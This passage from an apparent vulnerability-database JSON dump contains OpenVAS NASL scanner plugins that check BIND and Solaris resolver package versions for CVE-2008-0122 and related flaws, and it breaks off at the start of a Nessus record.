exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "description": "Oracle Linux Local Security Checks ELSA-2008-0300", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122582", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122582", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2008-0300", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2008-0300.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122582\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:48:36 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2008-0300\");\n script_tag(name:\"insight\", value:\"ELSA-2008-0300 - bind security, bug fix, and enhancement update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2008-0300\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2008-0300.html\");\n script_cve_id(\"CVE-2007-6283\", \"CVE-2008-0122\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.4~6.P1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.4~6.P1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.4~6.P1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.4~6.P1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.4~6.P1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.4~6.P1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.4~6.P1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.4~6.P1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:56:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-2925", "CVE-2007-6283", "CVE-2007-2926", "CVE-2007-2241"], "description": "Check for the Version of bind", "modified": "2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "id": "OPENVAS:860907", "href": "http://plugins.openvas.org/nasl.php?oid=860907", "type": "openvas", "title": "Fedora Update for bind FEDORA-2008-0904", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2008-0904\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"bind on Fedora 7\";\ntag_insight = \"BIND (Berkeley Internet Name Domain) is an implementation of the DNS\n (Domain Name System) protocols. BIND includes a DNS server (named),\n which resolves host names to IP addresses; a resolver library\n (routines for applications to use when interfacing with DNS); and\n tools for verifying that the DNS server is operating properly.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-January/msg00782.html\");\n script_id(860907);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:12:43 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-0904\");\n script_cve_id(\"CVE-2008-0122\", \"CVE-2007-6283\", \"CVE-2007-2925\", \"CVE-2007-2926\", \"CVE-2007-2241\");\n script_name( \"Fedora Update for bind FEDORA-2008-0904\");\n\n script_summary(\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.4.2~3.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6283"], "description": "Check for the Version of bind", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:861104", "href": "http://plugins.openvas.org/nasl.php?oid=861104", "type": "openvas", "title": "Fedora Update for bind FEDORA-2007-4655", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2007-4655\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"bind on Fedora 8\";\ntag_insight = \"BIND (Berkeley Internet Name Domain) is an implementation of the DNS\n (Domain Name System) protocols. BIND includes a DNS server (named),\n which resolves host names to IP addresses; a resolver library\n (routines for applications to use when interfacing with DNS); and\n tools for verifying that the DNS server is operating properly.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-December/msg00587.html\");\n script_id(861104);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:27:46 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-4655\");\n script_cve_id(\"CVE-2007-6283\");\n script_name( \"Fedora Update for bind FEDORA-2007-4655\");\n\n script_summary(\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC8\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0~20.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n bind-utils\n bind-devel\n bind\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5022113 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65584", "href": "http://plugins.openvas.org/nasl.php?oid=65584", "type": "openvas", "title": "SLES9: Security update for bind", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5022113.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for bind\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n bind-utils\n bind-devel\n bind\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5022113 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65584);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-0122\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for bind\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.4~4.6\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122"], "description": "Check for the Version of libc.so.1.9", "modified": "2017-02-20T00:00:00", "published": "2009-06-03T00:00:00", "id": "OPENVAS:855088", "href": "http://plugins.openvas.org/nasl.php?oid=855088", "type": "openvas", "title": "Solaris Update for libc.so.1.9 138387-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for libc.so.1.9 138387-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"libc.so.1.9 on solaris_5.10_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n libc.so.1.9\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855088);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:34:39 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"138387-01\");\n script_cve_id(\"CVE-2008-0122\");\n script_name( \"Solaris Update for libc.so.1.9 138387-01\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-138387-01-1\");\n\n script_summary(\"Check for the Version of libc.so.1.9\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"138387-01\", package:\"SUNWbcp\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122"], "description": "Check for the Version of libresolv.so.2, in.named and BIND9", "modified": "2018-04-06T00:00:00", "published": "2009-06-03T00:00:00", "id": "OPENVAS:1361412562310855168", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855168", "type": "openvas", "title": "Solaris Update for libresolv.so.2, in.named and BIND9 109326-24", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for libresolv.so.2, in.named and BIND9 109326-24\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"libresolv.so.2, in.named and BIND9 on solaris_5.8_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n libresolv.so.2, in.named and BIND9\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855168\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:37:58 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"109326-24\");\n script_cve_id(\"CVE-2008-0122\");\n script_name( \"Solaris Update for libresolv.so.2, in.named and BIND9 109326-24\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-109326-24-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of libresolv.so.2, in.named and BIND9\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", package:\"SUNWarc SUNWarcx SUNWcsl SUNWcsr SUNWhea SUNWcslx SUNWcstlx SUNWcsu SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-12T10:06:36", "description": "9.5.0-P1 release which contains fix for CVE-2008-1447. This update\nalso fixes parsing of inner ACLs.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2008-07-10T00:00:00", "title": "Fedora 8 : bind-9.5.0-28.P1.fc8 (2008-6281)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", 